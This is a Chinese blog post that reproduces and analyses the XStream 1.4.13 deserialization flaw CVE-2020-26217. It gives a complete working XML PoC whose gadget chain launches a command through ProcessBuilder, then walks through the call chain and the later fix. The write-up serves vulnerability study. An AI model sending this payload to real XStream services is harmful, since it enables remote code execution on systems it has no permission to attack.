『Java安全』XStream 1.4.13反序列化漏洞CVE-2020-26217复现与浅析

已于 2022-08-16 09:14:34 修改
阅读量1.7k 收藏 1
点赞数
分类专栏: # XStream 文章标签: java web安全 反序列化 Xstream cve
于 2022-08-15 17:56:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/126347957
版权

文章目录

漏洞简介

该漏洞是对CVE-2013-7285的绕过,在上一个版本做了以下修复:

  • 新增一个内置黑名单converter过滤EventHandler等
    private class InternalBlackList implements Converter {
        private InternalBlackList() {
        }

        public boolean canConvert(Class type) {
            return type == Void.TYPE || type == Void.class || !XStream.this.securityInitialized && type != null && (type.getName().equals("java.beans.EventHandler") || type.getName().endsWith("$LazyIterator") || type.getName().startsWith("javax.crypto."));
        }
        public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
            throw new ConversionException("Security alert. Marshalling rejected.");
        }

        public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
            throw new ConversionException("Security alert. Unmarshalling rejected.");
        }
  • 新增安全框架开发者可选择自定义黑白名单、以及使用默认安全策略

https://x-stream.github.io/security.html#framework
开发者自定义黑白名单
在这里插入图片描述
默认安全策略
在这里插入图片描述

影响版本

XStream ≤ 1.4.13

pom.xml

        <!-- https://mvnrepository.com/artifact/com.thoughtworks.xstream/xstream -->
        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.13</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/xpp3/xpp3_min -->
        <dependency>
            <groupId>xpp3</groupId>
            <artifactId>xpp3_min</artifactId>
            <version>1.1.4c</version>
        </dependency>

PoC

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='java.io.SequenceInputStream'>
              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
                <iterator class='javax.imageio.spi.FilterIterator'>
                  <iter class='java.util.ArrayList$Itr'>
                    <cursor>0</cursor>
                    <lastRet>-1</lastRet>
                    <expectedModCount>1</expectedModCount>
                    <outer-class>
                      <java.lang.ProcessBuilder>
                        <command>
                          <string>calc</string>
                        </command>
                      </java.lang.ProcessBuilder>
                    </outer-class>
                  </iter>
                  <filter class='javax.imageio.ImageIO$ContainsFilter'>
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>start</name>
                  </filter>
                  <next/>
                </iterator>
                <type>KEYS</type>
              </e>
              <in class='java.io.ByteArrayInputStream'>
                <buf></buf>
                <pos>0</pos>
                <mark>0</mark>
                <count>0</count>
              </in>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

代码审计

初步猜测

前置漏洞CVE-2013-7285已经分析过了

https://ho1aas.blog.csdn.net/article/details/126297121

涉及到的对象的层次结构大致如下:

map
  jdk.nashorn.internal.objects.NativeString
    com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data
      dataHandler
        com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource
          java.io.SequenceInputStream
            javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator
              javax.imageio.spi.FilterIterator
                java.util.ArrayList$Itr
                javax.imageio.ImageIO$ContainsFilter

关键应该就是在后三个,重点看一下

javax.imageio.spi.FilterIterator
  java.util.ArrayList$Itr
  javax.imageio.ImageIO$ContainsFilter

javax.imageio.spi.FilterIterator有个advance方法,会调用filter.filter()

在这里插入图片描述
javax.imageio.ImageIO$ContainsFilter的filter刚好能够反射调用方法

在这里插入图片描述
接下来就是具体调试看看如何调用到这一步

原理分析

反序列化map对象,new了一个空的,然后来到putCurrentEntryIntoMap把元素依次放进去,元素此时通过readCompleteItem()才开始反序列化

在这里插入图片描述
这里使用了栈来处理反序列化时对象之间的层次关系

在这里插入图片描述
接着,首先获取元素的类型,然后也是复用convertAnother进行反序列化

在这里插入图片描述
细节在doUnmarshal之中,对于同层次的节点直接穷举依次反序列化,“深度优先”

在这里插入图片描述
第一轮循环给NativeString赋值flags,然后第二次循环来处理<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>,先通过反射获取field

在这里插入图片描述
然后从xml的标签class属性获取值的类型

在这里插入图片描述
然后通过unmarshallField实例化,核心也是convertAnother

在这里插入图片描述
接下来就是循环递归反序列化上面的过程,我们直接看最后是怎么触发的

在这里插入图片描述
hashmap put去重调用了NativeString的hashCode,然后进入getStringValue

在这里插入图片描述
调用Base64data.toString()

在这里插入图片描述
先调了自身的get方法

在这里插入图片描述
如果Base64data.data为空就从数据源获取输入流并读取

在这里插入图片描述
读取会调用SequenceInputStream.nextStream(),然后调用MultiUIDefaults.nextElement()
在这里插入图片描述
如果type是KEYS,就会调用迭代器next的getKey方法获取

在这里插入图片描述
FilterIterator.next()调用了advance,然后就命令执行了

在这里插入图片描述

POP链

invoke:488, Method (java.lang.reflect)
filter:613, ImageIO$ContainsFilter (javax.imageio)
advance:821, FilterIterator (javax.imageio.spi)
next:839, FilterIterator (javax.imageio.spi)
nextElement:153, MultiUIDefaults$MultiUIDefaultsEnumerator (javax.swing)
nextStream:110, SequenceInputStream (java.io)
read:211, SequenceInputStream (java.io)
readFrom:65, ByteArrayOutputStreamEx (com.sun.xml.internal.bind.v2.util)
get:182, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
toString:286, Base64Data (com.sun.xml.internal.bind.v2.runtime.unmarshaller)
getStringValue:122, NativeString (jdk.nashorn.internal.objects)
hashCode:118, NativeString (jdk.nashorn.internal.objects)
hash:338, HashMap (java.util)
put:611, HashMap (java.util)
putCurrentEntryIntoMap:107, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:98, MapConverter (com.thoughtworks.xstream.converters.collections)
populateMap:92, MapConverter (com.thoughtworks.xstream.converters.collections)
unmarshal:87, MapConverter (com.thoughtworks.xstream.converters.collections)
convert:72, TreeUnmarshaller (com.thoughtworks.xstream.core)
convert:72, AbstractReferenceUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:66, TreeUnmarshaller (com.thoughtworks.xstream.core)
convertAnother:50, TreeUnmarshaller (com.thoughtworks.xstream.core)
start:134, TreeUnmarshaller (com.thoughtworks.xstream.core)
unmarshal:32, AbstractTreeMarshallingStrategy (com.thoughtworks.xstream.core)
unmarshal:1404, XStream (com.thoughtworks.xstream)
unmarshal:1383, XStream (com.thoughtworks.xstream)
fromXML:1277, XStream (com.thoughtworks.xstream)
main:11, Main (OneFourThirteen)

新版本修复分析

1.14.4不允许反序列化ProcessBuilder

在这里插入图片描述
realClass有类型判断

在这里插入图片描述
ban了三个类

在这里插入图片描述

衍生漏洞

与CVE-2020-26258和CVE-2020-26259是同类型漏洞,适当的dataSource可以触发SSRF和任意文件删除

https://x-stream.github.io/CVE-2020-26258.html
https://x-stream.github.io/CVE-2020-26259.html

参考

https://x-stream.github.io/CVE-2020-26217.html

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/126347957
版权声明:本文为原创,转载时须注明出处及本声明

XStream 反序列化漏洞 (CVE-2020-26258 & 26259) 的复现分析
smellycat000的专栏
12-16 3874
聚焦源代码安全,网罗国内外最新资讯!XstreamJava 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可...
Jenkins-CVE-2016-0792漏洞复现Xstream 反序列化漏洞
whojoe的博客
06-04 4918
Jenkins-CVE-2016-0792漏洞复现Xstream 反序列化漏洞)环境搭建漏洞复现环境清理参考文章 环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 下载链接 http://archives.jenkins-ci.org/war-stable/1.642.1/jenkins.war 这里需要在本地配置java环境,具体方法这里不在介绍,我复现
xstream最新版本_【漏洞预警】XStream小于1.4.14远程代码执行漏洞CVE202026217
weixin_39819576的博客
11-28 1923
01漏洞概述近日,XSteam官方发布版本更新,修复了一个安全漏洞。该漏洞编号为CVE-2020-26217,其最初报告为CVE-2017-9805,即未初始化安全框架的XStream实例取消任务时,存在任意命令执行漏洞。02影响范围XStream < 1.4.1403安全版本XStream 1.4.1404修复建议官方已在最新版本中修复了该漏洞,请受影响的用户尽快通过下方链接升级...
CVE-2020-26217: XStream 远程代码执行漏洞通告
爱国小白帽
11-16 6145
原创360CERT[三六零CERT](javascript:void(0)???? 2020-11-16 12:09:18 报告编号:B6-2020-111601 报告来源:360CERT 报告作者:360CERT 更新日期:2020-11-16 0x01 漏洞简述 20201116日,360CERT监测发现 XStream 发布了 XStream 安全更新 的风险通告,该漏洞编号为 CVE-2020-26217漏洞等级:严重 ,漏洞评分:9.8 。 XStream 发布安全更新修复了一处反
「深度解析Java反序列化漏洞|从readObject到Apache Commons Collections漏洞利用实战(附防御方案+工具复现)」
最新发布
浩策盾悟
03-05 1698
Java 程序反序列化来自不可信源的数据时,如果数据包含恶意构造的对象,攻击者可以利用反序列化漏洞执行任意代码。以下是一个 Python 脚本,用于模拟一个 Java 反序列化漏洞攻击的示例。假设我们已经知道反序列化数据的格式。Java 是一种面向对象的编程语言,使用序列化机制将对象转换为字节流进行存储或传输。以下是一些 Java 反序列化漏洞相关的最新。- Apache Struts2 反序列化漏洞。对象的恶意序列化数据,当反序列化发生时,类来执行序列化和反序列化操作。
xstream 去掉class
xixingzhe2的博客
09-19 881
开发十年,就只剩下这套Java开发体系了 &gt;&gt;&gt;    ...
XStream反序列化漏洞分析二
weixin_44825990的博客
12-13 1007
XStream反序列化流程及CVE-2020-26217漏洞分析
【组件攻击链】XStream组件高危漏洞分析利用
further_eye的博客
12-01 3182
XStream组件漏洞主要是java反序列化造成的远程代码执行漏洞,目前官方通过黑名单的方式对java反序列化攻击进行防御,由于黑名单防御机制存在被绕过的风险,因此以后可能会出现类似java反序列化漏洞
java字符串大小写转换
yuekangwei的博客
08-23 996
import static jdk.nashorn.internal.objects.NativeString.toLowerCase; import static jdk.nashorn.internal.objects.NativeString.toUpperCase; /** * 该代码展示字符串大小写 */ public class test { public static void main(String[] args) { //方法一: System.o
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
近日XStream官方发布安全更新,修复了XStream 反序列化漏洞CVE-2020-26258、CVE-2020-26259)。攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
利用icepdf将pdf转换成tif及jpge格式文件
08-17
利用icepdf很好的将pdf转换成一个或者多个tif格式图片,同时支持将pdf转换成jpge格式图片,很好解决pdf中内嵌字问题
xstream_1.4.3及其依赖包_xstream_1.4.3及其依赖包
09-22
解析xml文件需要用到jar包,内容包含xstream_1.4.3及_xstream_1.4.3 -dom4j及其依赖包,需要用到的都含有
[CVE-2020-26258/26259]Xstream任意文件删除/SSRF漏洞
公众号shadow sock7
12-15 3558
漏洞详情 CVE-2020-26259: 任意文件删除。 CVE-2020-26258: SSRF 细节 poc [CVE-2020-26258] SSRF <map> <entry> <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class='com.sun.xml.internal.bind.v2.run
S2-052远程代码执行漏洞和S2-045远程代码执行漏洞复现
weixin_48739941的博客
04-21 1390
1.复现S2-052远程代码执行漏洞 (1) cd vulhub/struts2/s2-052 切换目录。 (2) docker-compose up -d 启动 (3) http://192.168.80.157:8080/orders.xhtml (4)burpsuite抓包。 (5)send to repeater,修改数据包: POST /orders/3/edit HTTP/1.1 Host: 192.168.80.157:8080 Accept: */* A
关于XStream1.4.14 远程代码执行高危漏洞CVE-2020-26217)的详细验证方法
Lisoning的博客
02-08 329
注:本文仅可用于学习使用。XStreamJava 类库,用来将对象序列化成 XML ( JSON )或反序列化为对象。攻击者通过构造恶意的 XML,在受影响的 XStream 版本中绕过默认黑名单,触发远程代码执行。
复现S2-052远程代码执行漏洞
NLXHBM的博客
04-18 719
1.启动环境 docker-compose up -d 2.查找Ubuntu ip 3.burpsuite进行抓包 4. 发送以下数据包 POST /orders/3 HTTP/1.1 Host: 192.168.81.168:8080 Content-Length: 2419 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.81.168:8080 Conten..
漏洞复现 - - - Springboot未授权访问
热门推荐
weixin_67503304的博客
09-05 2万+
讲解了 Springboot未授权访问漏洞的原理,并且利用反弹shell的方式进行了漏洞复现,包括使用了powershell脚本文件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值